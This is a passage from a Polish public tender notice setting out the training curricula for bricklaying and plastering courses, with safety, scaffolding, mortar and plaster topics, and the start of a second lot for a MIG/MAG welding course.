- odzież ochronna i robocza, sprzęt ochrony osobistej;
- udzielenie pierwszej pomocy;
- wykonanie zaprawy murarskiej sposobem ręcznym; 
- wykonanie zaprawy murarskiej sposobem mechanicznym;
- receptura zapraw;
- materiały budowlane do zapraw;
- narzędzia pomiarowe;
- sprzęt specjalistyczny i pomocniczy;
4) rusztowania do robót murarskich:
- BHP przy pracy na rusztowaniach;
- BHP na stanowisku pracy;
- odzież ochronna i robocza, sprzęt ochrony osobistej;
- udzielanie pierwszej pomocy; 
- montaż i demontaż rusztowań; 
- eksploatacja i konserwacja rusztowań;
- rodzaje rusztowań;
5) BHP przy robotach murarskich:
- ogólne przepisy BHP;
- BHP przy obsłudze narzędzi i sprzętu;
- BHP przy pracy na rusztowaniach;
- BHP na stanowisku pracy;
- Odzież ochronna i robocza. Sprzęt ochrony osobistej;
- Udzielanie pierwszej pomocy;
6) Wykonywanie murów nośnych z różnych materiałów i o różnych grubościach:
- BHP przy obsłudze narzędzi i sprzętu;
- BHP przy pracy na rusztowaniach;
- BHP na stanowisku pracy;
- Odzież ochronna i robocza. Sprzęt ochrony osobistej;
- Udzielanie pierwszej pomocy;
- Montaż i demontaż rusztowań;
- Eksploatacja i konserwacja rusztowań;
- Wykonanie zaprawy murarskiej sposobem ręcznym;
- Wykonanie zaprawy murarskiej sposobem mechanicznym;
- Organizacja stanowiska pracy;
- Wykonywanie murów ciągłych;
- Wykonywanie murów narożnikowych;
- Wykonywanie murów przenikających;
- Wykonywanie murów z kanalami;
- Wiązania murów;
- Sposoby murowania;
- Rodzaje zapraw;
- Receptura zapraw murarskich;
- Czytanie rysunku robocz3ego;
- Materiały budowlane z kamienia;
- Ceramiczne materiały budowlane;
- Materiały budowlane betonowe, cementowe, silikatowe i z betonu komórkowego;
- Inne materiały budowlane;
- Materiały budowlane do zapraw murarskich;
- Narzędzia pomiarowe;
- Narzędzia robocze;
7) Wykonywanie sklepień, nadproży i stropów murarskich:
-  BHP przy obsłudze narzędzi i sprzętu;
- BHP przy pracy na rusztowaniach;
- BHP na stanowisku pracy;
- Odzież ochronna i robocza. Sprzęt ochrony osobistej;
- Udzielanie pierwszej pomocy;
- Montaż i demontaż rusztowań;
- Eksploatacja i konserwacja rusztowań;
- Wykonanie zaprawy murarskiej sposobem ręcznym;
- Wykonanie zaprawy murarskiej sposobem mechanicznym;
- Organizacja stanowiska pracy;
- Wykonywanie sklepień;
- Wykonywanie nadproży;
- Wykonywanie stropów murarskich;
- Sposoby murowania;
- Wiązania murów;
- Rodzaje zapraw;
- Receptura zapraw;
- Czytanie rysunku roboczego;
- Ceramiczne materiały budowlane;
- Materiały budowlane do zapraw murarskich;
- Inne materiały budowlane;
- Narzędzia pomiarowe;
 Sprzęt mechaniczny i pomocniczy;
- Rodzaje rusztowań;
- Montaż i demontaż rusztowań;
- Eksploatacja i konserwacja rusztowań;
- Wykonywanie zaprawy murarskiej sposobem ręcznym;
- Wykonanie zaprawy murarskiej sposobem mechanicznym;
- Organizacja stanowiska pracy;
- Wykonywanie sklepień;
- Wykonywanie nadproży;
- Wykonywanie stropów murarskich;
- Sposoby murowania ;
- Wiązania murów;
- Rodzaje zapraw;
- Receptura zapraw;
- Czytanie rysunku roboczego;
- Materiały budowlane do zapraw murarskich;
- Inne materiały budowlane;
- Narzędzia pomiarowe;
- Narzędzia robocze;
- Sprzęt mechaniczny i pomocniczy;
- Rodzaje rusztowań;
8) Wykonywanie gzymsów i attyk:
    - BHP przy obsłudze narzędzi i sprzętu
    - BHP przy pracy na rusztowaniach
    - BHP na stanowisku pracy
    - Odzież ochronna i robocza. Sprzęt ochrony osobistej
    - Udzielanie pierwszej pomocy
    - Montaż i demontaż rusztowań
    - Eksploatacja i konserwacja rusztowań 
    - Wykonanie zaprawy murarskiej sposobem ręcznym
    - Wykonanie zaprawy murarskiej sposobem mechanicznym
    - Organizacja stanowiska pracy
    - Wykonywanie gzymsów
    - Wykonywanie attyk
    - Sposoby murowania 
    - Wiązania murów
    - Rodzaje zapraw
    - Receptura zapraw
    - Czytanie rysunku roboczego
    - Ceramiczne materiały budowlane
    - Materiały budowlane do zapraw murarskich
    - Narzędzia pomiarowe
    - Narzędzia robocze
    - Sprzęt mechaniczny i pomocniczy
    - Rodzaje rusztowań
9) Wykonywanie murów mieszanych z różnych materiałów:
 - BHP przy obsłudze narzędzi i sprzętu
 - BHP przy pracy na rusztowaniach
 - BHP na stanowisku pracy
 - Odzież ochronna i robocza. Sprzęt ochrony osobistej
 - Udzielanie pierwszej pomocy
 - Montaż i demontaż rusztowań
 - Eksploatacja i konserwacja rusztowań 
 - Wykonanie zaprawy murarskiej sposobem ręcznym
 - Wykonanie zaprawy murarskiej sposobem mechanicznym
 - Organizacja stanowiska pracy
 - Wykonywanie murów mieszanych
 - Sposoby murowania 
 - Wiązania murów
 - Rodzaje zapraw
 - Receptura zapraw
 - Czytanie rysunku roboczego
 - Ceramiczne materiały budowlane
 - Materiały budowlane betonowe, cementowe, silikatowe i z betonu komórkowego
 - Materiały izolacyjne
 - Materiały budowlane betonowe, cementowe, silikatowe i z betonu komórkowego
      - Narzędzia pomiarowe
      - Narzędzia robocze
      - Sprzęt mechaniczny i pomocniczy
      - Rodzaje rusztowań
10) Wykonywanie murów szczelinowych z wkładką izolacyjna:
- BHP przy obsłudze narzędzi i sprzętu
- BHP przy pracy na rusztowaniach
- BHP na stanowisku pracy
- Odzież ochronna i robocza. Sprzęt ochrony osobistej
- Udzielanie pierwszej pomocy
- Montaż i demontaż rusztowań
- Eksploatacja i konserwacja rusztowań 
- Wykonanie zaprawy murarskiej sposobem ręcznym
- Wykonanie zaprawy murarskiej sposobem mechanicznym
- Organizacja stanowiska pracy
- Wykonywanie murów szczelinowych
- Sposoby murowania 
- Wiązania murów
- Rodzaje zapraw
- Receptura zapraw
- Czytanie rysunku roboczego
- Ceramiczne materiały budowlane
- Materiały budowlane betonowe, cementowe, silikatowe i z betonu komórkowego
- Materiały izolacyjne
- Materiały budowlane do zapraw murarskich
- Narzędzia pomiarowe
- Narzędzia robocze
- Sprzęt mechaniczny i pomocniczy
- Rodzaje rusztowań
11) Wykonywanie ścian działowych z rożnych materiałów:
   - BHP przy obsłudze narzędzi i sprzętu
   - BHP przy pracy na rusztowaniach
   - BHP na stanowisku pracy
   - Odzież ochronna i robocza. Sprzęt ochrony osobistej
   - Udzielanie pierwszej pomocy
   - Montaż i demontaż rusztowań
   - Eksploatacja i konserwacja rusztowań 
   - Wykonanie zaprawy murarskiej sposobem ręcznym
   - Wykonanie zaprawy murarskiej sposobem mechanicznym
   - Organizacja stanowiska pracy
   - Wykonywanie ścianek działowych
   - Sposoby murowania 
   - Wiązania murów
   - Rodzaje zapraw
   - Receptura zapraw
   - Czytanie rysunku roboczego
   - Ceramiczne materiały budowlane
   - Materiały budowlane betonowe, cementowe, silikatowe i z betonu komórkowego
   - Materiały budowlane ze szkła
   - Inne materiały budowlane
   - Materiały budowlane do zapraw murarskich
   - Narzędzia pomiarowe
   - Narzędzia robocze
   - Sprzęt mechaniczny i pomocniczy
   - Rodzaje rusztowań
12) Wykonywanie słupów i filarów międzyokiennych:
   - BHP przy obsłudze narzędzi i sprzętu
   - BHP przy pracy na rusztowaniach
   - BHP na stanowisku pracy
   - Odzież ochronna i robocza. Sprzęt ochrony osobistej
   - Udzielanie pierwszej pomocy
   - Montaż i demontaż rusztowań
   - Eksploatacja i konserwacja rusztowań 
   - Wykonanie zaprawy murarskiej sposobem ręcznym
   - Wykonanie zaprawy murarskiej sposobem mechanicznym
   - Organizacja stanowiska pracy
   - Wykonuje słupy i filary międzyokienne
   - Sposoby murowania 
   - Wiązania murów
   - Rodzaje zapraw
   - Receptura zapraw
   - Ceramiczne materiały budowlane
   - Materiały budowlane do zapraw murarskich
   - Narzędzia pomiarowe
   - Narzędzia robocze
   - Sprzęt mechaniczny i pomocniczy
   - Rodzaje rusztowań
13)Osadzanie w murze stolarki i ślusarki budowlanej:
   - BHP przy obsłudze narzędzi i sprzętu
   - BHP przy pracy na rusztowaniach
   - BHP na stanowisku pracy
   - Odzież ochronna i robocza. Sprzęt ochrony osobistej
   - Udzielanie pierwszej pomocy
   - Montaż i demontaż rusztowań
   - Eksploatacja i konserwacja rusztowań 
   - Wykonanie zaprawy murarskiej sposobem ręcznym
   - Wykonanie zaprawy murarskiej sposobem mechanicznym
   - Organizacja stanowiska pracy
   - Osadzanie stolarki okiennej i drzwiowej
   - Osadzanie ślusarki budowlanej
   - Rodzaje zapraw
   - Receptura zapraw
   - Czytanie rysunku roboczego
   - Ceramiczne materiały budowlane
   - Inne materiały budowlane
   - Materiały budowlane do zapraw murarskich
   - Narzędzia pomiarowe
   - Narzędzia robocze
   - Sprzęt mechaniczny i pomocniczy
   - Rodzaje rusztowań
14) Spoinowanie i licowanie ścian:
   - BHP przy obsłudze narzędzi i sprzętu
   - BHP przy pracy na rusztowaniach
   - BHP na stanowisku pracy
   - Odzież ochronna i robocza. Sprzęt ochrony osobistej
   - Udzielanie pierwszej pomocy
   - Montaż i demontaż rusztowań
   - Eksploatacja i konserwacja rusztowań 
   - Wykonanie zaprawy murarskiej sposobem ręcznym
   - Wykonanie zaprawy murarskiej sposobem mechanicznym
   - Organizacja stanowiska pracy
   - Wykonywanie spoinowania 
   - Licowanie ścian
   - Sposoby murowania 
   - Wiązania murów
   - Rodzaje zapraw
   - Receptura zapraw
   - Czytanie rysunku roboczego
   - Materiały budowlane z kamienia
   - Ceramiczne materiały budowlane
   - Narzędzia pomiarowe
   - Narzędzia robocze
   - Sprzęt mechaniczny i pomocniczy
   - Rodzaje rusztowań
15) Wykonywanie izolacji przeciwwilgociowej:
   - BHP przy obsłudze narzędzi i sprzętu
     - BHP przy pracy na rusztowaniach
   - BHP na stanowisku pracy
   - Odzież ochronna i robocza. Sprzęt ochrony osobistej
   - Udzielanie pierwszej pomocy
   - Montaż i demontaż rusztowań
   - Eksploatacja i konserwacja rusztowań 
   - Wykonanie zaprawy murarskiej sposobem ręcznym
   - Wykonanie zaprawy murarskiej sposobem mechanicznym
   - Organizacja stanowiska pracy
   - Wykonywanie izolacji przeciwwilgociowej
   - Receptura zapraw
   - Rodzaje zapraw
   - Czytanie rysunku roboczego
   - Ceramiczne materiały budowlane
   - Materiały izolacyjne
   - Materiały budowlane do zapraw murarskich
   - Narzędzia pomiarowe
   - Narzędzia robocze
   - Sprzęt mechaniczny i pomocniczy
   - Rodzaje rusztowań
16) Wykonywanie izolacji termicznej:
- BHP przy obsłudze narzędzi i sprzętu
- BHP przy pracy na rusztowaniach - BHP na stanowisku pracy
   - Odzież ochronna i robocza. Sprzęt ochrony osobistej
   - Udzielanie pierwszej pomocy
   - Montaż i demontaż rusztowań
   - Eksploatacja i konserwacja rusztowań 
   - Wykonanie zaprawy murarskiej sposobem ręcznym
   - Wykonanie zaprawy murarskiej sposobem mechanicznym
   - Organizacja stanowiska pracy
   - Wykonywanie izolacji termicznej
   - Receptura zapraw
   - Rodzaje zapraw
   - Czytanie rysunku roboczego
   - Ceramiczne materiały budowlane
   - Materiały izolacyjne
   - Materiały budowlane do zapraw murarskich
   - Narzędzia pomiarowe
   - Narzędzia robocze
   - Sprzęt mechaniczny i pomocniczy
   - Rodzaje rusztowań
17) Prace remontowe:
- BHP przy obsłudze narzędzi i sprzętu
- BHP przy pracy na rusztowaniach
- BHP na stanowisku pracy
- Odzież ochronna i robocza. Sprzęt ochrony osobistej
- Udzielanie pierwszej pomocy
- Montaż i demontaż rusztowań
- Eksploatacja i konserwacja rusztowań 
- Wykonanie zaprawy murarskiej sposobem ręcznym
- Wykonanie zaprawy murarskiej sposobem mechanicznym
- Organizacja stanowiska pracy
- Zabezpieczenie konstrukcji nośnych
- Remont ścian i filarów
- Remont fundamentów
- Wykonanie otworów w ścianach
- Sposoby murowania 
- Wiązania murów
- Receptura zapraw
- Rodzaje zapraw
- Czytanie rysunku roboczego
- Materiały budowlane z kamienia
- Ceramiczne materiały budowlane
- Materiały budowlane betonowe, cementowe, silikatowe i z betonu komórkowego
- Inne materiały budowlane
 - Materiały budowlane do zapraw murarskich
- Narzędzia pomiarowe
- Narzędzia robocze
- Sprzęt mechaniczny i pomocniczy
18) Czytanie dokumentacji:
 -Czytanie projektu architektonicznego
 -Czytanie projektu konstrukcyjnego
 -Czytanie opisu technicznego, świadectw ITB, atestów, instrukcji
19) Materiały narzędzia sprzęt i urządzenia
-BHP na placu budowy
-Bezpieczeństwo przy posługiwaniu się narzędziami i sprzętem mechanicznym
-Mierzenie przy użyciu miarek i taśm
-Spoiwa do zapraw
-Kruszywa do zapraw tynkarskich
-Materiały pomocnicze do robót tynkarskich
      -Narzędzia i sprzęt do tynkowania
20) Składowanie, magazynowanie materiałów i ochrona środowiska:
-BHP na placu budowy
-BHP przy robotach tynkarskich
-BHP przy posługiwaniu się narzędziami i sprzętem mechanicznym
-Mierzenie przy użyciu miarek i taśm
-Składowanie materiałów budowlanych
-Składowanie materiałów niebezpiecznych
-Transport mat. budow. i ochrona środowiska
-Przyg. zaprawy spos. ręcznym i mechan.
-Spoiwa do zapraw
-Kruszywa do zapraw tynkarskich
-Materiały do suchych tynków
-Materiały pomocnicze do robót tynkarskich
21) Przygotowanie zapraw sposobem ręcznym i mechanicznym:
 -BHP na placu budowy
 -BHP przy robotach tynkarskich
 -Udzielanie pierwszej pomocy
 -Ustalenie proporcji, dozowanie składników zapraw
 -Ręczne przygotowanie zapraw
 -Mechaniczne przygotowanie zapraw
 -Przygotowanie zapraw do tynków wodoszczelnych
 -Transport materiałów budowlanych i ochrona środowiska
 -Przygotowanie zapraw i nakładanie tynków z mas plastycznych
 -Rodzaje zapraw tynkarskich
 -Stosowanie i rodzaje tynków wodoszczelnych
 -Czytanie projektu architektonicznego
 -Spoiwa do zapraw
 -Kruszywa do zapraw tynkarskich
 -Materiały pomocnicze do robót tynkarskich
 -Narzędzia i sprzęt do tynkowania
 -Agregaty tynkarskie i sprzęt
22) Stosowanie bezpiecznych metod pracy:
 -Podstawowe akty prawne BHP
 -Prawa i obowiązki pracowników
 -BHP na placu budowy
 -BHP przy robotach tynkarskich
 -Bezpieczeństwo przy posługiwaniu się narzędziami i sprzętem
 -Udzielanie pierwszej pomocy
 -Podstawowe akty prawne BHP
 -Prawa i obowiązki pracowników
 -BHP na placu budowy
 -BHP przy robotach tynkarskich
 -Bezpieczeństwo przy posługiwaniu się narzędziami i sprzętem
 -Udzielanie pierwszej pomocy
23) Wykonywanie rusztowań do tynków wewnętrznych:
 -BHP na placu budowy
 -Bezpieczeństwo przy posługiwaniu się narzędziami i sprzętem mechanicznym
 -Prawa i obowiązki pracowników
 -Montaż rusztowania na kozłach
 -Montaż rusztowania teleskopowego
 -Montaż rusztowania stolikowego 
 -Montaż rusztowania typu Warszawa
 -Mierzenie przy użyciu miarek i taśm
 -Składowanie materiałów budowlanych
24) Wyznaczanie lica tynku:
 -BHP przy robotach tynkarskich
 -Prawa i obowiązki pracowników
 -Bezpieczeństwo przy posługiwaniu się narzędziami i sprzętem mechanicznym
 -Wyznaczanie punktu kierunkowego
 -Wyznaczanie lica metodą pasów kierunkowych
 -Wyznaczanie lica tynku metodą listw
 -Wyznaczanie lica tynku metodą punktów wysokościowych
 -Rozpoznanie podłoża
 -Ręczne przygotowanie zaprawy
 -Mierzenie przy użyciu miarek i taśm
 -Czytanie projektu architektonicznego
 -Czytanie projektu konstrukcyjnego
 -Czytanie opisu technicznego, świadectw ITB, atestów
 -Materiały pomocnicze do robót tynkarskich
 -Spoiwa do zapraw
 -Kruszywa do zapraw tynkarskich
 -Narzędzia i sprzęt do tynkowania
25) Przygotowanie podłoży pod tynk:
 -BHP przy robotach tynkarskich
 -Prawa i obowiązki pracowników 
 -Bezpieczeństwo przy posługiwaniu się narzędziami i sprzętem mechanicznym
 -Rozpoznanie podłoża
 -Przygotowanie podłoży budowlanych
 -Mierzenie przy użyciu miarek i taśm
 -Czytanie projektu architektonicznego
 -Czytanie projektu konstrukcyjnego
 -Materiały pomocnicze do robót tynkarskich
 -Narzędzia i sprzęt do tynkowania
26) Wykonanie tynku jednowarstwowego:
 -Udzielanie pierwszej pomocy
 -Prawa i obowiązki pracowników
 -BHP przy robotach tynkarskich
 -Bezpieczeństwo przy posługiwaniu się narzędziami i sprzętem technicznym
 -Rozpoznanie podłoża
 -Przygotowanie podłoży budowniczych
 -Ustalanie proporcji dozowanie składników zapraw
 -Ręczne przygotowanie zaprawy
 -Mechaniczne przygotowanie zaprawy
 -Wyznaczanie lica tynku metodą pasów kierunkowych
 -Wyznaczanie lica tynku metodą listw
 -Wyznaczanie lica tynku metodą punktów wysokościowych
 -Montaż elementów wykończenia tynków
 -Mierzenie przy użyciu miarek i taśm
 -Montaż rusztowania na kozłach 
 -Montaż rusztowania teleskopowego
 -Montaż rusztowania typu Warszawa
 -Montaż rusztowania typu stolikowego
 -Wykonanie tynku jednowarstwowego
 -Czytanie projektu Architektonicznego
 -Czytanie projektu konstrukcyjnego
 -Czytanie opisu technicznego, świadectw ITB, atasów
 -Spoiwa do zapraw
 -Kruszywa do zapraw tynkarskich
 -Materiały pomocnicze do robót tynkarskich
 -Narzędzia i sprzęt do tynkowania
27) Wykonywanie tynku dwuwarstwowego:
 -Prawa i obowiązki pracowników
 -BHP przy robotach tynkarskich
 -Bezpieczeństwo posługiwania się narzędziami i sprzętem technicznym
 -Rozpoznanie podłoża
 -Przygotowanie podłoży budowniczych
 -Ustalanie proporcji dozowanie składników zapraw
 -Ręczne przygotowanie zaprawy
 -Mechaniczne przygotowanie zaprawy
 -Wyznaczanie lica tynku metodą pasów kierunkowych
 -Wyznaczanie lica tynku metodą listw
 -Wyznaczanie lica tynku metodą punktów wysokościowych
 -Montaż elementów wykończenia tynków
  -Montaż rusztowania teleskopowego
  -Montaż rusztowania typu stolikowego
 -Wykonanie tynku jednowarstwowego
 -Czytanie projektu architektonicznego
  -Czytanie projektu konstrukcyjnego
 -Czytanie opisu technicznego, świadectw ITB, atasów
 -Spoiwa do zapraw
 -Kruszywa do zapraw tynkarskich
 -Materiały pomocnicze do robót tynkarskich
 -Narzędzia i sprzęt do tynkowania
28) Wykonanie tynku trójwarstwowego zwykłego:
-Prawa i obowiązki pracowników
-BHP przy robotach tynkarskich
-Bezpieczeństwo posługiwania się narzędziami i sprzętem technicznym
-Rozpoznanie podłoża
-Przygotowanie podłoży budowniczych
-Ustalanie proporcji dozowanie składników zapraw
 -Ręczne przygotowanie zaprawy
-Mechaniczne przygotowanie zaprawy
-Wyznaczanie lica tynku metodą pasów kierunkowych
 -Wyznaczanie lica tynku metodą listw
-Wyznaczanie lica tynku metodą punktów wysokościowych
-Montaż elementów wykończenia tynków
-Mierzenie przy użyciu miarek i taśm
-Montaż rusztowania na kozłach
-Mierzenie przy użyciu miarek i taśm
-Montaż rusztowania na kozłach
-Montaż rusztowania teleskopowego
-Montaż rusztowania typu stolikowego
-Wykonanie i wykończenie tynku trójwarstwowego
-Czytanie projektu architektonicznego
-Czytanie projektu konstrukcyjnego
-Czytanie opisu technicznego, świadectw ITB, atasów
-Spoiwa do zapraw
-Kruszywa do zapraw tynkarskich
-Materiały pomocnicze do robót tynkarskich
-Narzędzia i sprzęt do tynkowania
29) Wykonywanie tynku doborowego:
-Prawa i obowiązki pracowników
-BHP przy robotach tynkarskich
-Bezpieczeństwo posługiwania się narzędziami i sprzętem technicznym
-Udzielenie pierwszej pomocy
-Rozpoznanie podłoża
-Przygotowanie podłoży budowniczych
-Ustalanie proporcji dozowanie składników zapraw
-Ręczne przygotowanie zaprawy
-Mechaniczne przygotowanie zaprawy
-Wyznaczanie lica tynku metodą pasów kierunkowych
-Wyznaczanie lica tynku metodą listw
-Wyznaczanie lica tynku metodą punktów wysokościowych
-Montaż elementów wykończenia tynków
-Mierzenie przy użyciu miarek i taśm
-Montaż rusztowania na kozłach
-Montaż rusztowania teleskopowego
-Montaż rusztowania typu stolikowego
-Wykonanie tynku doborowego
-Czytanie projektu architektonicznego
-Czytanie projektu konstrukcyjnego
-Czytanie opisu technicznego, świadectw ITB, atasów
-Spoiwa do zapraw
-Kruszywa do zapraw tynkarskich
-Materiały pomocnicze do robót tynkarskich
-Narzędzia i sprzęt do tynkowania
30) Wykonywanie tynków pocieniowych na powierzchniach  elementów prefabrykowanych:
-Prawa i obowiązki pracowników
-BHP przy robotach tynkarskich
-Bezpieczeństwo posługiwania się narzędziami i sprzętem technicznym
-Rozpoznanie podłoża
-Przygotowanie podłoży budowniczych
-Ustalanie proporcji dozowanie składników zapraw
-Ręczne przygotowanie zaprawy
-Mechaniczne przygotowanie zaprawy
-Wyznaczanie lica tynku metodą pasów kierunkowych
-Wyznaczanie lica tynku metodą listw
-Wyznaczanie lica tynku metodą punktów wysokościowych
-Montaż elementów wykończenia tynków
-Mierzenie przy użyciu miarek i taśm
-Montaż rusztowania na kozłach
-Montaż rusztowania teleskopowego
-Montaż rusztowania typu stolikowego
-Wykonanie tynku pocienionego
-Czytanie projektu konstrukcyjnego
-Czytanie opisu technicznego, świadectw ITB, atasów
-Spoiwa do zapraw
-Kruszywa do zapraw tynkarskich
-Materiały pomocnicze do robót tynkarskich
-Narzędzia i sprzęt do tynkowania
31) Wykonywanie tynków zewnętrznych ozdobnych:
-Prawa i obowiązki pracowników
- BHP na placu budowy
-BHP przy robotach tynkarskich
-Bezpieczeństwo posługiwania się narzędziami i sprzętem technicznym
-Transport materiałów i ochrona środowiska
-Ustalenie proporcji i dozowanie składników zaprawy
-Ręczne przygotowanie zaprawy
-Mechaniczne przygotowanie zaprawy
-Montaż rusztowania na kozłach
-Montaż rusztowania teleskopowego
-Montaż rusztowania typu Warszawa
-Montaż rusztowania typu stolikowego
-Rozpoznanie podłoża
-Przygotowanie podłoży budowlanych
-Wykonanie warstwy obrzutu i narzutu
-Wykończenie powierzchni tynku dwuwarstwowego
-Wykonanie tynków nakrapianych
-Wykonanie tynku ozdobnego przez obróbkę narzutu
-Wykonanie obrzutu i narzutu sposobem mechanicznym
-Rodzaje zapraw
-Czytanie projektu architektonicznego
-Czytanie projektu konstrukcyjnego
-Spoiwa do zapraw
-Kruszywa do zapraw tynkarskich
-Materiały pomocnicze do robót tynkarskich
-Narzędzia i sprzęt do tynkowania
-Agregaty tynkarskie i sprzęt
32) Wykonanie tynków zewnętrznych szlachetnych:
-Prawa i obowiązki pracowników
-BHP na placu budowy
-BHP przy robotach tynkarskich BHP przy robotach tynkarskich
-Bezpieczeństwo posługiwania się narzędziami i sprzętem technicznym
-Ustalanie proporcji dozowanie składników zapraw
-Ręczne przygotowanie zaprawy
-Mechaniczne przygotowanie zaprawy
-Montaż rusztowania na kozłach
-Montaż rusztowania teleskopowego
-Montaż rusztowania typu Warszawa
-Montaż rusztowania typu stolikowego
-Rozpoznanie podłoża
-Przygotowanie podłoży budowlanych
-Wykonanie warstwy obrzutu i narzutu
-Wykończenie powierzchni tynku dwuwarstwowego
-Przygotowanie podłoża pod tynki szlachetne
-Wykonanie tynku szlachetnego gładkiego
-Wykonanie tynków szlachetnych cyklinowanych
-Wykonanie tynków szlachetnych zmywanych
-Wykonanie tynków szlachetnych nakrapianych
-Wykonanie tynków szlachetnych kamieniarskich groszkowanych
-Wykonanie obrzutu i narzutu sposobem mechanicznym
-Rodzaje zapraw
-Czytanie projektu architektonicznego
-Czytanie projektu konstrukcyjnego
-Spoiwa do zapraw
-Kruszywa do zapraw tynkarskich
-Materiały pomocnicze do robót tynkarskich
-Narzędzia i sprzęt do tynkowania
-Agregaty tynkarskie i sprzęt
33) Wykonanie tynków suchych z płyt gipsowo-kartonowych
-BHP na placu budowy
-BHP przy robotach tynkarskich
-Bezpieczeństwo posługiwania się narzędziami i sprzętem technicznym
-Udzielenie pierwszej pomocy
-Montaż rusztowania na kozłach
-Montaż rusztowania teleskopowego
-Montaż rusztowania typu Warszawa
-Montaż rusztowania typu stolikowego
-Rozpoznanie podłoża
-Przygotowanie podłoży budowlanych
-Przygotowanie podłoży pod tynki suche
-Mierzenie przy użyciu miarek i taśm
-Montaż suchego tynku na listwach drewnianych
-Montaż suchego tynku przez mocowanie plackami
-Wykończenie złączy i naroży
-Naprawa tynków
-Składowanie materiałów budowlanych
-Transport materiałów i ochrona środowiska
-Czytanie projektu architektonicznego
-Czytanie projektu konstrukcyjnego
-Czytanie opisu technicznego, świadectw ITB, atasów
-Materiały do wykonania suchych tynków
-Materiały pomocnicze do robót tynkarskich
-Wyznaczanie punktu kierunkowego
34) Wykonanie tynków ciągnionych:
-Prawa i obowiązki pracowników
-BHP na placu budowy
-BHP przy robotach tynkarskich
-Bezpieczeństwo posługiwania się narzędziami i sprzętem technicznym
-Ustalanie proporcji dozowanie składników zapraw
-Ręczne przygotowanie zaprawy
-Mechaniczne przygotowanie zaprawy
-Montaż rusztowania na kozłach
-Montaż rusztowania teleskopowego
-Montaż rusztowania teleskopowego
-Montaż rusztowania typu stolikowego
-Wykonanie warstwy obrzutu i narzutu
-Tynkowanie gzymsów i faset
-Tynkowanie słupów i kolumn o przekroju kolowym
-Czytanie projektu architektonicznego
-Czytanie projektu konstrukcyjnego
-Czytanie opisu technicznego, świadectw ITB, atasów
-Rodzaje zapraw
-Spoiwa do zapraw
-Kruszywa do zapraw tynkarskich
-Materiały pomocnicze do robót tynkarskich
-Narzędzia i sprzęt do tynkowania
-Wzorniki do tynków ciągnionych
-Mierzenie przy użyciu miarek i taśm
35) Wykonanie tynku sposobem mechanicznym:
-Prawa i obowiązki pracowników
-BHP na placu budowy
-BHP przy robotach tynkarskich
-Bezpieczeństwo posługiwania się narzędziami i sprzętem technicznym
-Rozpoznanie podłoża
-Przygotowanie podłoży budowlanych
-Ustalanie proporcji dozowanie składników zapraw
-Mechaniczne przygotowanie zaprawy
-Wyznaczanie punktu kierunkowego
-Wyznaczanie lica tynku metodą pasów kierunkowych
-Wyznaczanie lica tynku metodą listw
-Wyznaczanie lica tynku metodą punktów wysokościowych
-Mierzenie przy użyciu miarek i taśm
-Montaż rusztowania na kozłach
-Montaż rusztowania teleskopowego
-Montaż rusztowania typu Warszawa
-Montaż rusztowania typu stolikowego
-Wykonanie obrzutu i narzutu sposobem mechanicznym
-Wykonanie gładzi sposobem mechanicznym
-Czytanie projektu architektonicznego
-Czytanie projektu konstrukcyjnego
-Czytanie opisu technicznego, świadectw ITB, atasów
-Spoiwa do zapraw
-Kruszywa do zapraw tynkarskich
-Materiały pomocnicze do robót tynkarskich
-Narzędzia i sprzęt do tynkowania
-Agregaty tynkarskie i sprzęt
36) Wykonanie tynków wodoszczelnych:
-Prawa i obowiązki pracowników
-BHP na placu budowy
-BHP przy robotach tynkarskich
-Bezpieczeństwo posługiwania się narzędziami i sprzętem technicznym
-Ustalanie proporcji dozowanie składników zapraw
-Ręczne przygotowanie zaprawy
-Mechaniczne przygotowanie zaprawy
-Montaż rusztowania na kozłach
-Montaż rusztowania teleskopowego
-Montaż rusztowania typu Warszawa
-Montaż rusztowania typu stolikowego
-Rozpoznanie podłoża
-Przygotowanie podłoży budowlanych
-Wykonanie tynku jednowarstwowego
-Wykonanie tynku dwuwarstwowego
-Wykonanie warstwy obrzutu i narzutu
-Wykonanie obrzutu i narzutu sposobem mechanicznym
-Przygotowanie zapraw do tynków wodoszczelnych cementu wypalanego
-Wykonanie tynku wodoszczelnego z dodatkami chemicznymi
-Rodzaje zapraw
-Stosowanie i rodzaje tynków wodoszczelnych
-Czytanie projektu architektonicznego
-Czytanie projektu konstrukcyjnego
-Spoiwa do zapraw
-Kruszywa do zapraw tynkarskich
-Materiały pomocnicze do robót tynkarskich
-Narzędzia i sprzęt do tynkowania
-Agregaty tynkarskie i sprzęt
37) Naprawa tynków:
-BHP przy robotach tynkarskich
-Bezpieczeństwo posługiwania się narzędziami i sprzętem technicznym
-Ustalanie proporcji dozowanie składników zapraw
-Ręczne przygotowanie zaprawy
-Montaż rusztowania na kozłach
-Montaż rusztowania teleskopowego
-Montaż rusztowania typu Warszawa
-Montaż rusztowania typu stolikowego
-Wykonanie warstwy obrzutu i narzutu
-Wykończenie powierzchni tynku dwuwarstwowego
-Wykonanie tynku trójwarstwowego
-Rozpoznanie uszkodzeń tynków 
-Przygotowanie tynków do naprawy
-Naprawianie tynków
-Rodzaje zapraw
-Spoiwa do zapraw
-Kruszywa do zapraw tynkarskich
-Narzędzia i sprzęt do tynkowania
ciąg dalszy w SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> zakres II:Kurs spawania blach i rur  spoinami  pachwinowymi - proces spawania 135 oraz proces
                     spawania 131- 5 osób w I edycji,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Czas realizacji: nie dłużej niż 8 tygodni.
Program szkolenia: Program szkolenia powinien obejmować minimum 280 godzin, w tym minimum             40 godzin teorii oraz minimum 240 godzin zajęć praktycznych (z zakresu spawania metodą MIG i MAG). Program szkolenia powinien zostać opracowany zgodnie z wytycznymi Instytutu Spawalnictwa w Gliwicach oraz powinien uwzględniać przepisy Rozporządzenia Ministra Gospodarki z dnia 27 kwietnia 2000r. w sprawie bezpieczeństwa i higieny pracy przy pracach spawalniczych (Dz. U. Nr 40 poz. 470).
